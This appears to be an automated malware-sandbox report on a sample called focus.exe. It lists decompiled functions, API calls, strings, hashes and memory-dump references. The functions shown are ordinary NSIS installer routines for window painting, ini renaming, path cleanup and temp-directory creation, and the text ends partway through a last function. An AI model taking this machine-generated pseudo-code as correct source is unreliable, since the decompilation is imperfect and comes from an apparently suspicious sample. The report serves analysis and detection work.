lstrlenA.KERNEL32(?), ref: 004043D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
GetDlgItem.USER32 ref: 0040445B
SendMessageA.USER32(00000000), ref: 0040445E
GetDlgItem.USER32 ref: 00404489
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
LoadCursorA.USER32 ref: 004044D8
SetCursor.USER32(00000000), ref: 004044E1
LoadCursorA.USER32 ref: 004044F7
SetCursor.USER32(00000000), ref: 004044FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A

Strings

N, xrefs: 00404477
: Completed, xrefs: 004044B4

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Name Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Name Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Name Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Name Setup
API String ID: 941294808-4002928617
Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405d66
0x00405d6f
0x00405d76
0x00405d8a
0x00405db2
0x00405dbd
0x00405dc1
0x00405de1
0x00405de8
0x00405df2
0x00405dff
0x00405e04
0x00405e09
0x00405e0d
0x00405e1c
0x00405e1e
0x00405e2b
0x00405e2f
0x00405eca
0x00000000
0x00405e45
0x00405e52
0x00405e76
0x00405e7a
0x00405e99
0x00405e9d
0x00405e9d
0x00405e9f
0x00405ea8
0x00405eb3
0x00405ebe
0x00405ec4
0x00000000
0x00405ec4
0x00405e7c
0x00405e7f
0x00405e8a
0x00405e86
0x00405e88
0x00405e89
0x00405e89
0x00405e91
0x00405e93
0x00000000
0x00405e93
0x00405e5d
0x00405e63
0x00000000
0x00405e63
0x00405e2f
0x00405e0d
0x00405d8c
0x00405d97
0x00405da0
0x00405da4
0x00000000
0x00000000
0x00405da4
0x00405ed5

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
GetShortPathNameA.KERNEL32 ref: 00405DA0

Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

GetShortPathNameA.KERNEL32 ref: 00405DBD
wsprintfA.USER32 ref: 00405DDB
GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
GlobalFree.KERNEL32 ref: 00405EC4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Strings

[Rename], xrefs: 00405E45, 00405E57
%s=%s, xrefs: 00405DD1

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004063d4
0x004063dc
0x004063f0
0x004063f0
0x004063f6
0x00406403
0x00406403
0x00406404
0x00406406
0x0040640a
0x0040640c
0x00406415
0x00406417
0x00406431
0x00406439
0x00406439
0x0040643e
0x00406440
0x00406442
0x00406446
0x00406447
0x0040644a
0x00406452
0x00406454
0x00406458
0x00000000
0x00000000
0x0040645e
0x00406463
0x00000000
0x00000000
0x00000000
0x00406463
0x00406468

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\focus.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
CharNextA.USER32(?,"C:\Users\user\Desktop\focus.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

Strings

*?|<>/":, xrefs: 0040641A
C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
"C:\Users\user\Desktop\focus.exe" , xrefs: 0040640E

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\focus.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2107010139
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD

Uniqueness

Uniqueness Score: -1.00%

Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004041f4
0x004042aa
0x00000000
0x004042aa
0x00404205
0x00404209
0x00000000
0x00404223
0x00404223
0x0040422c
0x00000000
0x00000000
0x0040422e
0x0040423a
0x0040423d
0x0040423d
0x00404243
0x00404249
0x00404249
0x00404255
0x0040425b
0x00404262
0x00404265
0x00404268
0x0040426a
0x0040426a
0x00404272
0x00404278
0x00404278
0x00404282
0x00404287
0x0040428a
0x0040428f
0x00404292
0x00404292
0x004042a2
0x004042a2
0x00000000
0x004042a5

APIs

GetWindowLongA.USER32 ref: 004041FF
GetSysColor.USER32(00000000), ref: 0040423D
SetTextColor.GDI32(?,00000000), ref: 00404249
SetBkMode.GDI32(?,?), ref: 00404255
GetSysColor.USER32(?), ref: 00404268
SetBkColor.GDI32(?,?), ref: 00404278
DeleteObject.GDI32(?), ref: 00404292
CreateBrushIndirect.GDI32(?), ref: 0040429C

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404adc
0x00404ae9
0x00404aef
0x00404b2d
0x00404b2d
0x00404b3c
0x00404b43
0x00000000
0x00404b45
0x00404af1
0x00404b00
0x00404b08
0x00404b0b
0x00404b1d
0x00404b23
0x00404b2a
0x00000000
0x00404b2a
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
GetMessagePos.USER32 ref: 00404AF1
ScreenToClient.USER32 ref: 00404B0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43

Strings

f, xrefs: 00404B1F

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x2b691b
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df1
0x00402df8
0x00402dfa
0x00402dfa
0x00402e10
0x00402e20
0x00402e32
0x00402e32
0x00402e3a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(002B691B,00000064,?), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32 ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004056ef
0x004056f3
0x004056f6
0x004056fc
0x00405700
0x00405704
0x0040570c
0x00405713
0x00405719
0x00405720
0x0040572f
0x00405731
0x00000000
0x00405731
0x0040573b
0x00405742
0x00405758
0x00000000
0x00000000
0x00000000
0x0040575a
0x0040575e

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
GetLastError.KERNEL32 ref: 0040573B
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
GetLastError.KERNEL32 ref: 0040575A

Strings

C:\Users\user\Desktop, xrefs: 004056E4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-3254906087
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
